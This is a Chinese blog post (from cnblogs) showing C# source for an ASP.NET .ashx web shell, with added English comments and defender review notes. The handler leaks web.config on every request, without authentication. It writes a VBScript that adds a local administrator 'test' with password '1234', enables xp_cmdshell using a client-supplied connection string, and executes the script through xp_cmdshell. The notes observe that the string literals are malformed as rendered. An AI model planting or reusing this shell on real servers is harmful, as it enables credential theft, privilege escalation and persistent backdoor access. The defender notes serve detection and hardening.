  • ashx入侵

    <%@ WebHandler Language="C#" Class="TextLd" %>
    using System;
    using System.Collections.Generic;
    using System.Linq;
    using System.Web;
    using System.Data.SqlClient;

    /// <summary>
    /// ASP.NET generic handler (.ashx) published as an example of a web shell.
    /// Every request is answered with the contents of the site's web.config, and the
    /// "method" query-string value selects further actions: dropping a VBScript file
    /// into the web root, enabling xp_cmdshell on a SQL Server, or running the dropped
    /// script through xp_cmdshell.
    /// </summary>
    // Defender notes (review):
    //  - Nothing in this class checks authentication or authorization; any client that
    //    can reach the .ashx URL can trigger every branch.
    //  - Artifacts this code leaves behind and that are worth hunting for: an unexpected
    //    .ashx file in the site, a 1.vbs file in the web root, sp_configure changes that
    //    turn on 'xp_cmdshell', the SQL Server service process launching cscript, and a
    //    new local account (the script text names "test") in the Administrators group.
    //  - Controls that blunt it: an application-pool identity without write access to the
    //    web root, database logins for the site that are not allowed to change server
    //    configuration, xp_cmdshell left disabled, and file-integrity monitoring on the
    //    site directory.
    public class TextLd : IHttpHandler
    {
    /// <summary>
    /// Starts d:1.vbs and then writes script text to that same path. The
    /// <paramref name="newPath"/> argument is never used, and nothing in the visible
    /// class calls this method.
    /// </summary>
    // NOTE(review): "d:1.vbs" has no separator after the drive letter, so it is a
    // drive-relative path; the page rendering may have dropped a backslash - confirm.
    // NOTE(review): as rendered on this page the script string contains unescaped double
    // quotes, so the listing is not valid C# as-is. The script text refers to the WinNT
    // provider, the Administrators group, a user "test" and the password "1234".
    public void CreateLocalUser(string newPath)
    {
    System.Diagnostics.Process.Start(@"d:1.vbs");
    System.IO.File.WriteAllText(@"d:1.vbs", "set wsnetwork=CreateObject("WSCRIPT.NETWORK") os="WinNT://"&wsnetwork.ComputerName Set ob=GetObject(os) Set oe=GetObject(os&"/Administrators,group") '属性,admin组 od=ob.Create("user","test") '建立用户 SetPassword "1234" '设置密码 SetInfo of=GetObject(os&"/test",user) add os&"/test"");
    }
    /// <summary>
    /// Writes the full text of the application's web.config to the HTTP response.
    /// </summary>
    // web.config commonly holds connection strings and keys, so this is a direct
    // configuration-disclosure primitive; secrets exposed this way should be rotated.
    public void ShowWebConfig(HttpContext context)
    {
    context.Response.Write(System.IO.File.ReadAllText(context.Request.MapPath("~/web.config")));
    }
    /// <summary>
    /// Writes the same script text as CreateLocalUser to 1.vbs in the application root.
    /// </summary>
    // The write succeeds only if the worker-process identity can write to the web root;
    // denying that permission stops this step. The literal has the same rendering
    // problem (unescaped quotes) as the one in CreateLocalUser.
    public void WriteVbs(HttpContext context)
    {
    System.IO.File.WriteAllText(context.Request.MapPath("~/1.vbs"), "set wsnetwork=CreateObject("WSCRIPT.NETWORK") os="WinNT://"&wsnetwork.ComputerName Set ob=GetObject(os) Set oe=GetObject(os&"/Administrators,group") '属性,admin组 od=ob.Create("user","test") '建立用户 SetPassword "1234" '设置密码 SetInfo of=GetObject(os&"/test",user) add os&"/test"");
    }
    /// <summary>
    /// Opens a SQL Server connection with the given connection string and executes the
    /// given SQL text as a non-query.
    /// </summary>
    /// <param name="connection">Connection string; the only caller takes it from the request query string.</param>
    /// <param name="sql">SQL text executed exactly as passed, with no parameters.</param>
    public void ExecuteSql(string connection, string sql)
    {
    using (SqlConnection con = new SqlConnection(connection))
    {
    using (SqlCommand commd = new SqlCommand(sql, con))
    {
    con.Open();
    commd.ExecuteNonQuery();
    // Redundant with the enclosing using block, which disposes the connection.
    con.Close();
    }
    }
    }
    /// <summary>
    /// Request entry point: sends web.config as text/plain, then dispatches on the
    /// "method" query-string value and ends the response.
    /// </summary>
    public void ProcessRequest(HttpContext context)
    {
    context.Response.ContentType = "text/plain";
    // Unconditional: web.config is disclosed on every request, whatever "method" is.
    context.Response.Write(System.IO.File.ReadAllText(context.Request.MapPath("~/web.config")));
    try
    {
    // The connection string comes from the client, not from the site's configuration.
    var connection = context.Request.QueryString["connection"];
    switch (context.Request.QueryString["method"])
    {
    // "1": drop the script file into the web root.
    case "1": WriteVbs(context); break;
    // "2": change SQL Server configuration; both statements need a login that is
    // permitted to run sp_configure and RECONFIGURE.
    case "2":
    ExecuteSql(connection,@"sp_configure 'show advanced options',1 reconfigure");
    ExecuteSql(connection,@"sp_configure 'xp_cmdshell',1 reconfigure");// enable xp_cmdshell on the database server
    break;
    // "3": have SQL Server run cscript on the dropped file through xp_cmdshell; the
    // command text is built by string concatenation from the mapped path.
    case "3": ExecuteSql(connection, "exec master..xp_cmdshell 'cscript " + context.Request.MapPath("~/1.vbs") + "'");
    break;
    // Any other value (or none): write web.config to the response a second time.
    default:
    ShowWebConfig(context);
    break;
    }
    }
    catch (Exception ex)
    {
    // The raw exception message is returned to the client.
    context.Response.Write(ex.Message);
    }
    context.Response.End();
    }
    /// <summary>
    /// Always false: tells ASP.NET not to reuse this handler instance for another request.
    /// </summary>
    public bool IsReusable
    {
    get
    {
    return false;
    }
    }
    }

  • 原文地址:https://www.cnblogs.com/a14907/p/5053530.html